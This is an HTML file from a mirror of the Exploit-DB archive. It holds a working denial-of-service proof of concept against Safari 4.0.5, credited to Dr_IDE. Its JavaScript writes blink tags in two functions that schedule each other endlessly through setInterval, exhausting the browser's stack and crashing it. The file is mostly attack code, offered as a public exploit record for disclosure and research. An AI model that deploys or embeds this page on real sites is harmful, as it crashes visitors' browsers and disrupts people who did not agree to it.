exploit-db-mirror/exploits/windows/dos/12425.html
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

23 lines
No EOL
381 B
HTML

<html>
<script>
loop1();
var a = "<blink>";
function loop1()
{
document.write(a);
setInterval(loop2,0);
}
function loop2()
{
document.write(a);
setInterval(loop1,0);
}
</script>
<body>
Webkit (Safari) Stack Exhaustion DoS
Found By: Dr_IDE
Credit To: Mattias Karlsson
Reference: http://www.exploit-db.com/exploits/12401
Tested On: Windows 7 + Safari 4.0.5
</body>
</html>